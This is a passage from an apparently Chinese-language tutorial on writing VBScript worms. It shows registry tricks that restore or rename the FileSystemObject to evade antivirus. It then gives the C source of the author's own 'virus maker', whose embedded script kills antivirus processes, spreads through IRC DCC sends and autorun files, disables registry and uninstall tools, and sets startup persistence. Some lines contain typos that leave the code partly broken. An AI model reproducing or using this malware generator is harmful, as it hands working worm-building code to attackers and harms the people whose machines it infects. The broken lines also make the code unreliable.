5,有些windows的高级用户为了防范脚本病毒,把注册表中的filesystemobject项给删掉了,新的蠕虫将在执行的开始,
检查系统的filesystemobject项是否存在,如果不存在的话,将重新写入filesystemobject项,当然你也可以将其换个名称,这样有些
杀毒软件就不一定认识了,
On Error Resume Next
Set wa=CreateObject("WSc"+"ript.S"+"hell")
tt=wa.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools")
if tt=1 then
wa.RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", 00000000, "REG_DWORD"
end if
uu=wa.RegRead("HKEY_CLASSES_ROOT\\CLSID\\{0D43FE01-F093-11CF-8940-00A0C9054228}")
if uu="" then
uu.RegWrite "HKEY_CLASSES_ROOT\\CLSID\\{0D43FE01-F093-11CF-8940-00A0C9054228}" , "FileSystemObject", "REG_SZ"
end if
或者
a.regdelete "HKEY_CLASSES_ROOT\\Scripting.FileSystemObject\\CLSID\\"
a.regdelete "HKEY_CLASSES_ROOT\\Scripting.FileSystemObject\\"
a.regwrite "HKEY_CLASSES_ROOT\\wangzhitong\\", "FileSystem Object", "REG_SZ"
a.regwrite "HKEY_CLASSES_ROOT\\wangzhitong\\CLSID\\", "{0D43FE01-F093-11CF-8940-00A0C9054228}", "REG_SZ"
set yu=createobject("wangzhitong")
以后系统内的filesystemobject项就被替换成了wangzhitong.
6,自己写好的蠕虫怎能让其他的蠕虫一起存在一个系统中呢,所以要劲可能的消灭其他的病毒程序:)
当然你要先分析那些病毒程序,只要清除掉他们就行了。
附: 脚本病毒制造机
利用病毒制造机可以很轻松的制造出病毒来,比如库儿尼科娃的作者就是利用vbswg做出来的,小弟也用过很多种的脚本病毒制造机,
但用他们制造出的病毒,都是很低级的,还有人把用脚本该写注册表的程序就称之为病毒,而且写出个破烂程序来就大肆宣扬,晕3,
不知国内的大哥们究竟是怎么想的,记得vbswg2.0是用vb写的,而且是很早的时候了,高手是不愿写这些东西的,自己高考后也写过
一个脚本病毒制造机,一开始觉的很有成就感,可漫漫深入理解编程的实质时,就觉的那是个非常无聊的程序,下面给出这个程序的原代码,
高手不必看了,没做优化,菜鸟可以鉴戒一下:
#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#include <string.h>
#include <conio.h>
#define exit_success 0
#define again 1
#define m 4
int make();
int care();
void password(void);
void out(void);
main()
{
char choose;
clrscr();
printf("*******************************************************************************\\n");
printf("This is a VBS virus made machine,it\''s only used to study,don\''t used to destory.\\n");
printf(" Programmed by W.Z.T\\n");
printf(" Version 0.1\\n");
printf("*******************************************************************************\\n");
puts("\\n\\t1--Strat Make\\t\\t2--View Help\\t\\t3--Exit");
while(again)
{
printf("choice:");
scanf("%c",&choose);
tch(choose)
{
case\''1\'':
{
make();
clrscr();
return 0;
}
case\''2\'':
{
clrscr();
puts("I like Virus,so i write a machine which anybody can make a Virus much easiler.\\n");
puts("This Version is my first one,i will try to write a better one later.\\n");
out();
}
case\''3\'':
{
exit(exit_success);
}
default:
{
puts("choice 1,2 or 3");
}
}
}
}
void out(void)
{
printf("\\npause");
getch();
main();
}
void password(void)
{
int i,j,y=0;
char pwd[11+1],pass[]="wangzhitong";
fflush(stdin);
printf("If you want to use this function,please input the password.\\n");
for(j=0;;)
{
if((pwd[j]=getch())==13)
{
pwd[j]=\''\\0\'';
break;
}
else if(pwd[j]==8)
{
if(y!=0)
{
printf("\\b");
y--;
j--;
}
putchar(0);
printf("\\b");
}
else if(j==11)
continue;
else
{
printf("*");
y++;
j++;
}
}
if(strcmp(pwd,pass)==0)
{
printf("\\ndone.\\n");
}
else
{
printf("password error.\\n");
}
}
int make()
{
FILE *fp,*fp1;
int i,j,aa,bb,cc,dd,ee,ff,gg,hh,jjj,kkk,lll,y=0,word=0,number=0;
char ch,w[5],*vc=w;
char subject[200],*sub=subject;
char body[400],*bo=body;
char string[100],*pop=string;
char road[100],name2[40],road2[100],time[20],web[100];
char pwd[11+1],pass[]="wangzhitong";
char *ext1[27]={"txt","vbs","vbe","html","htm","bak","dll","pfg","ppl","c","bin","sig","vdb","dat","doc","xls","tsk","tmp","vdb","vlg","dsc","ptn","set","log","cfg","idx","rec"};
char **pl=ext1;
char str1[25][100]={"(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\"","(ext=\\""};
char str2[]="\\") or";
char *str[27],**pa=str;
char *a="\\non error resume next\\nset fso=createobject(\\"scripting.filesystemobject\\")\\nset a=createobject(\\"wscript.shell\\")\\nset dir1=fso.getspecialfolder(0)\\nset dir2=fso.getspecialfolder(1)\\nset k=fso.getfile(wscript.scriptfullname)\\n";
char *b="k.copy(dir2&\\"\\\\system.vbe\\")\\n";
char *c="k.copy(dir1&\\"\\\\windows.vbe\\")\\n";
char *d="set ag=fso.createtextfile(dir1&\\"\\kill.vbe\\")\\nag.writeline \\"on error resume next\\"\\nag.writeline \\"do\\"\\nag.writeline \\"strComputer=\\"\\".\\"\\"\\"\\n";
char *e="ag.writeline \\"set objWMIService=GetObject(\\"\\"winmgmts:\\"\\" & \\"\\"{impersonationLevel=impersonate}!\\\\\\\\\\"\\" & strComputer & \\"\\"\\\\root\\\\cimv2\\"\\")\\"\\n";
char *f="ag.writeline \\"fv=Array(\\"\\"notepad.exe\\"\\",\\"\\"pccguide.exe\\"\\",\\"\\"pccclient.exe\\"\\",\\"\\"rfw.exe\\"\\",\\"\\"davpfw.exe\\"\\",\\"\\"vpc32.exe\\"\\",\\"\\"ravmon.exe\\"\\")\\"\\n";
char *g="ag.writeline \\"for Each fa in fv\\"\\nag.writeline \\"Set colProcessList=objWMIService.ExecQuery (\\"\\"Select * from Win32_Process Where Name=\\\''\\"\\"&fa&\\"\\"\\\''\\"\\")\\"\\nag.writeline \\"For Each objProcess in colProcessList\\"\\n";
char *h="ag.writeline \\"objProcess.Terminate()\\"\\nag.writeline \\"Next\\"\\nag.writeline \\"next\\"\\nag.writeline \\"loop\\"\\nag.close\\na.run fso.getspecialfolder(0) & \\"\\\\kill.vbe\\"\\nset ai=fso.getfile(dir1&\\"\\\\kill.vbe\\")\\n";
char *ii="ai.attributes=ai.attributes+2\\n";
char *jj="set cc=fso.createtextfile(dir1&\\"\\\\Run.bat\\")\\ncc.writeline \\"@echo off\\"\\ncc.writeline \\"cls\\"\\ncc.writeline \\"echo %date% %time%\\"\\ncc.writeline \\"echo Chinese hacker is the best!\\"\\n";
char *k="cc.writeline \\"prompt $P$G$$$_*tthacker@eyou.com*\\"\\ncc.writeline \\"echo on\\"\\ncc.close\\nset at=fso.getfile(dir1&\\"\\\\Run.bat\\")\\nat.attributes=at.attributes+2\\n";
char *l="set sii=fso.createtextfile(dir2&\\"\\\\event.ini\\")\\nsii.writeline \\"[Levels]\\"\\nsii.writeline \\"Enabled=1\\"\\nsii.writeline \\"Count=6\\"\\nsii.writeline \\"Level1=000-Unknowns\\"\\nsii.writeline \\"000-UnknownsEnabled=1\\"\\n";
char *mm="sii.writeline \\"Level2=100-Level 100\\"\\nsii.writeline \\"100-Level 100Enabled=1\\"\\nsii.writeline \\"Level3=200-Level 200\\"\\nsii.writeline \\"200-Level 200Enabled=1\\"\\n";
char *nn="sii.writeline \\"Level4=300-Level 300\\"\\nsii.writeline \\"300-Level 300Enabled=1\\"\\nsii.writeline \\"Level5=400-Level 400\\"\\nsii.writeline \\"400-Level 400Enabled=1\\"\\n";
char *oo="sii.writeline \\"Level6=500-Level 500\\"\\nsii.writeline \\"500-Level 500Enabled=1\\"\\nsii.writeline \\"\\"\\n";
char *pp="sii.writeline \\"[000-Unknowns]\\"\\nsii.writeline \\"UserCount=0\\"\\nsii.writeline \\"EventCount=0\\"\\nsii.writeline \\"\\"\\n";
char *qq="sii.writeline \\"[100-Level 100]\\"\\nsii.writeline \\"User1=*!*@*\\"\\nsii.writeline \\"UserCount=1\\"\\nsii.writeline \\"Event1=ON JOIN:#:/dcc tsend $nick \\" & fso.getspecialfolder(1) & \\"\\\\system.vbe\\"\\nsii.writeline \\"EventCount=1\\"\\n";
char *rr="sii.writeline \\"\\"\\nsii.writeline \\"[200-Level 200]\\"\\nsii.writeline \\"UserCount=0\\"\\nsii.writeline \\"EventCount=0\\"\\nsii.writeline \\"\\"\\n";
char *ss="sii.writeline \\"[300-Level 300]\\"\\nsii.writeline \\"UserCount=0\\"\\nsii.writeline \\"EventCount=0\\"\\nsii.writeline \\"\\"\\nsii.writeline \\"[400-Level 400]\\"\\nsii.writeline \\"UserCount=0\\"\\nsii.writeline \\"EventCount=0\\"\\n";
char *tt="sii.writeline \\"\\"\\nsii.writeline \\"[500-Level 500]\\"\\nsii.writeline \\"UserCount=0\\"\\nsii.writeline \\"EventCount=0\\"\\nsii.close\\nset wi=fso.getfile(dir2&\\"\\\\event.ini\\")\\nwi.attributes=attributes+2\\n";
char *uu="set rei=fso.createtextfile(dir1&\\"\\\\check.vbe\\")\\nrei.writeline \\"on error resume next\\"\\nrei.writeline \\"dim bb,aa,cc\\"\\nrei.writeline \\"set cc=createobject(\\"\\"wscript.shell\\"\\")\\"\\n";
char *vv="rei.writeline \\"aa=minute(time)\\"\\nrei.writeline \\"bb=aa\\"\\nrei.writeline \\"do\\"\\nwei.writeline \\"bb=minute(time)\\"\\nrei.writeline \\"loop until aa>=bb+1\\"\\nrei.writeline \\"cc.run \\"\\"system.vbe\\"\\"\\"\\nrei.close\\n";
char *ww="a.run \\"check.vbe\\"\\nset ahd=fso.getfile(dir1&\\"\\\\check.vbe\\")\\nahd.attributes=attributes+2\\nset ah=fso.getfile(dir2&\\"\\wscript.exe\\")\\nah.attributes=attritutes+2\\n";
char *xx="set bh=fso.getfile(dir2&\\"\\\\cscript.exe\\")\\nbh.attributes=attributes+2\\nset apq=fso.createtextfile(dir2&\\"\\system.inf\\")\\napq.writeline \\"[Autorun]\\"\\napq.writeline \\"open=system.vbs\\"\\napq.close\\n";
char *yy="set pr=fso.getfile(dir2&\\"\\\\system.inf\\")\\npr.attributes=attributes+2\\nkill()\\nregruns()\\nlistadriv()\\njuyu()\\nmail()\\n";
char *kill1="sub kill()\\nset fso=createobject(\\"scripting.filesystemobject\\")\\nset aa=createobject(\\"wscript.shell\\")\\nbb = \\"";
char *kill2="vv = they(bb)\\nset tt=fso.createtextfile(fso.getspecialfolder(0) & \\"\\\\rav.exe\\",true)\\ntt.write vv\\ntt.close\\naa.run fso.getspecialfolder(0) & \\"\\\\rav.exe\\",1,false\\ntehy(our)\\nend sub\\n";
char *kill3="Function they(our)\\nFor mine=1 To Len(our) Step 2\\nthey = they & Chr(\\"&h\\" & Mid(our,mine, 2))\\nNext\\nEnd Function\\n";
char *reg1="sub regruns()\\non error resume next\\nset a=createobject(\\"wscript.shell\\")\\nkj=\\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\\\"\\nki=\\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\\\"\\n";
char *reg2="a.regwrite kj&\\"Internet Settings\\\\NoNetAutodial\\",01,\\"REG_BINARY\\"\\na.run \\"RUNDLL32.exe shell32,dll,SHExitWindowsEx2\\"\\na.run \\"ping -1 6500 -t ";
char *reg3="a.regwrite kj&\\"Policies\\\\System\\\\DisableRegistryTools\\",\\"00000001\\",\\"REG_DWORD\\"\\n";
char *reg4="a.regwrite kj&\\"Policies\\\\Explorer\\\\NoFolderOptions\\",\\"00000001\\",\\"REG_DWORD\\"\\n";
char *reg5="a.regwrite kj&\\"Policies\\\\Uninstall\\\\NoAddFromCDorFloppy\\"\\"00000001\\",\\"DWORD\\"\\n";
char *reg6="a.regwrite kj&\\"Policies\\\\Uninstall\\NoAddRemovePrograms\\",\\"00000001\\",\\"REG_DWORD\\"\\n";
char *reg7="a.regwrite kj&\\"Policies\\\\Uninstall\\NoAddRemovePage\\",\\"00000001\\",\\"REG_DWORD\\"\\n";
char *reg8="a.regwrite kj&\\"Policies\\\\Explorer\\\\Advanced\\\\folder\\\\Hidden\\\\SHOWALL\\\\checkedValue\\",\\"00000001\\",\\"REG_DWORD\\"\\n";
char *reg9="a.regwrite \\"HKLM\\\\Software\\\\CLASSES\\\\.reg\\",\\"txtfile\\"\\n";
char *reg10="a.regwrite \\"HKLM\\\\Software\\\\Microsoft\\\\Command Processor\\\\AutoRun\\",\\"%systemroot%\\\\run.bat&system32.vbe\\",\\"REG_SZ\\"\\n";
char *reg11="a.retwrite \\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\system\\",dir1&\\"\\\\windows.vbe\\"\\nend sub\\n";
